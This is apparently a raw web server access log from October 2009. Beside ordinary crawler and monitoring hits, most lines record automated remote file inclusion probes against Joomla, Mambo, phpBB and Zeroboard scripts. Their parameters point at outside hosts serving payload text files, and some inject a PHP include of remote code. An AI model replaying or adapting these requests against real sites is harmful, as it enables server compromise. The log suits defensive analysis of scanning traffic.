62.140.23.192 - - [06/Oct/2009:01:14:03 -0400] "GET /logs/access_log.Q109063000%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:14:07 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_akobook&Itemid=&func=&mosConfig_absolute_path=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:14:08 -0400] "GET /logs/access_log.Q109052300%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
12.46.124.72 - - [06/Oct/2009:01:14:09 -0400] "GET /logs/error_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:14:19 -0400] "GET /logs/access_log.Q109063000%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
12.46.124.72 - - [06/Oct/2009:01:14:29 -0400] "GET /logs/access_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:14:31 -0400] "GET /logs/access_log.Q109063000%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:14:35 -0400] "GET /logs/access_log.Q109052300%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:14:43 -0400] "GET /logs/error_log.Q109072100 HTTP/1.0" 200 2621299 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:14:43 -0400] "GET /logs/error_log.Q109100300 HTTP/1.0" 200 3446921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:14:46 -0400] "GET /logs/error_log.Q109100200 HTTP/1.0" 200 4437539 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.234.19.49 - - [06/Oct/2009:01:14:52 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:14:52 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.234.19.49 - - [06/Oct/2009:01:14:52 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://akar.web.tr/media/xml1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.140.23.192 - - [06/Oct/2009:01:14:52 -0400] "GET /logs/access_log.Q109052300%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
78.110.50.120 - - [06/Oct/2009:01:15:11 -0400] "GET /logs//include.php?path[docroot]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
78.110.50.120 - - [06/Oct/2009:01:15:11 -0400] "GET /logs/access_log.Q109063000//include.php?path[docroot]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
78.110.50.120 - - [06/Oct/2009:01:15:11 -0400] "GET /logs/access_log.Q109071300//include.php?path[docroot]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
78.110.50.120 - - [06/Oct/2009:01:15:11 -0400] "GET //include.php?path[docroot]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
77.242.37.212 - - [06/Oct/2009:01:15:26 -0400] "GET /logs/access_log.Q109062900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:14:47 -0400] "GET /logs/access_log.Q109061900 HTTP/1.0" 200 3745986 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:15:30 -0400] "GET /logs/error_log.Q109051600 HTTP/1.0" 200 3915567 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.242.37.212 - - [06/Oct/2009:01:15:33 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:15:37 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:15:33 -0400] "GET /logs/error_log.Q109092200 HTTP/1.0" 200 1889688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:14:49 -0400] "GET /logs/access_log.Q109080400 HTTP/1.0" 200 4786327 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.242.37.212 - - [06/Oct/2009:01:15:45 -0400] "GET /logs/access_log.Q109092000%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
67.195.112.120 - - [06/Oct/2009:01:15:38 -0400] "GET /logs/error_log.Q109072100 HTTP/1.0" 200 2621299 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Oct/2009:01:16:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.225.145.23 - - [06/Oct/2009:01:16:15 -0400] "GET /logs/error_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.nanuquevirtual.com/idr?? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
67.195.112.120 - - [06/Oct/2009:01:15:41 -0400] "GET /logs/error_log.Q109100300 HTTP/1.0" 200 3446921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.162.74.91 - - [06/Oct/2009:01:16:45 -0400] "GET /logs/access_log.Q109082400%20%20/index.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:16:45 -0400] "GET /index.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:16:45 -0400] "GET /logs/index.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
123.125.66.73 - - [06/Oct/2009:01:16:55 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.112.120 - - [06/Oct/2009:01:16:08 -0400] "GET /logs/error_log.Q109100200 HTTP/1.0" 200 4437539 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:16:20 -0400] "GET /logs/error_log.Q109051600 HTTP/1.0" 200 3915567 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.120 - - [06/Oct/2009:01:17:09 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.180.9.60 - - [06/Oct/2009:01:17:11 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; AskTB5.4)"
189.180.9.60 - - [06/Oct/2009:01:17:12 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; AskTB5.4)"
189.180.9.60 - - [06/Oct/2009:01:17:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; AskTB5.4)"
189.180.9.60 - - [06/Oct/2009:01:17:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; AskTB5.4)"
69.162.74.91 - - [06/Oct/2009:01:17:27 -0400] "GET /logs/index.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:17:27 -0400] "GET /index.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:17:27 -0400] "GET /logs/access_log.Q109082400/index.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:01:18:04 -0400] "GET /logs/access_log.Q109083100//include/mail.inc.php?skin_board_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 246 "-" "Mozilla/5.0"
195.186.64.229 - - [06/Oct/2009:01:18:05 -0400] "GET /logs/access_log.Q109091000//include/mail.inc.php?skin_board_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 246 "-" "Mozilla/5.0"
87.139.66.104 - - [06/Oct/2009:01:18:11 -0400] "GET //imgs//?_zb_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
87.139.66.104 - - [06/Oct/2009:01:18:11 -0400] "GET /logs//imgs//?_zb_path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
77.242.37.212 - - [06/Oct/2009:01:18:44 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:18:47 -0400] "GET /logs/error_log.Q109082400/index.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:19:07 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:19:07 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:19:07 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:19:09 -0400] "GET /logs/error_log.Q109072900//main.php?sayfa=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:01:19:17 -0400] "GET /logs/error_log.Q109082400%20%20/index.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:19:26 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:19:26 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:19:26 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:19:40 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:01:19:57 -0400] "GET //?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:01:19:57 -0400] "GET /logs/access_log.Q109091200%20%20//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:01:19:57 -0400] "GET /logs//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:20:09 -0400] "GET /logs/access_log.Q109070800//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:20:09 -0400] "GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:20:10 -0400] "GET /logs//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:20:12 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:20:12 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:20:12 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
174.37.136.126 - - [06/Oct/2009:01:20:18 -0400] "GET //?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
174.37.136.126 - - [06/Oct/2009:01:20:18 -0400] "GET /logs/access_log.Q109091200%20%20//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
174.37.136.126 - - [06/Oct/2009:01:20:18 -0400] "GET /logs//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 200 20719 "-" "Mozilla/5.0"
202.57.166.249 - - [06/Oct/2009:01:20:27 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
202.57.166.249 - - [06/Oct/2009:01:20:27 -0400] "GET //include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
202.57.166.249 - - [06/Oct/2009:01:20:27 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://omasol.free.fr/whois?%0D? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
222.73.17.7 - - [06/Oct/2009:01:20:33 -0400] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:20:33 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:34 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:34 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:34 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:20:38 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:20:38 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:01:20:38 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://seva.uni.cc/images/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:20:38 -0400] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:43 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:54 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:54 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:54 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:58 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:59 -0400] "GET /logs/access_log.Q109082500%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:59 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:20:59 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:01:21:03 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.184.252.3 - - [06/Oct/2009:01:21:10 -0400] "GET /logs/access_log.Q109080400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:01:21:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.115 - - [06/Oct/2009:01:21:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
218.55.227.178 - - [06/Oct/2009:01:21:28 -0400] "GET /?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:21:28 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:21:28 -0400] "GET /logs/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 20714 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:21:29 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:21:29 -0400] "GET /logs/?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 20714 "-" "Mozilla/5.0"
82.193.15.3 - - [06/Oct/2009:01:21:32 -0400] "GET //include.php?path[docroot]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
82.193.15.3 - - [06/Oct/2009:01:21:32 -0400] "GET /logs/access_log.Q109060200//include.php?path[docroot]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
82.193.15.3 - - [06/Oct/2009:01:21:32 -0400] "GET /logs/access_log.Q109081100//include.php?path[docroot]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
82.193.15.3 - - [06/Oct/2009:01:21:32 -0400] "GET /logs//include.php?path[docroot]=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
69.175.35.138 - - [06/Oct/2009:01:21:32 -0400] "GET /logs/access_log.Q109092200%20%20//?_zb_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.55.227.178 - - [06/Oct/2009:01:21:34 -0400] "GET /?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.73.17.7 - - [06/Oct/2009:01:21:42 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.psgkorea.com/bbs/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
174.143.3.188 - - [06/Oct/2009:01:22:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
174.143.3.188 - - [06/Oct/2009:01:22:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [06/Oct/2009:01:22:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
174.143.3.188 - - [06/Oct/2009:01:22:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
187.6.104.107 - - [06/Oct/2009:01:22:14 -0400] "GET /logs/error_log.Q109071700//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
220.125.237.35 - - [06/Oct/2009:01:22:26 -0400] "GET /error.php?dir=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
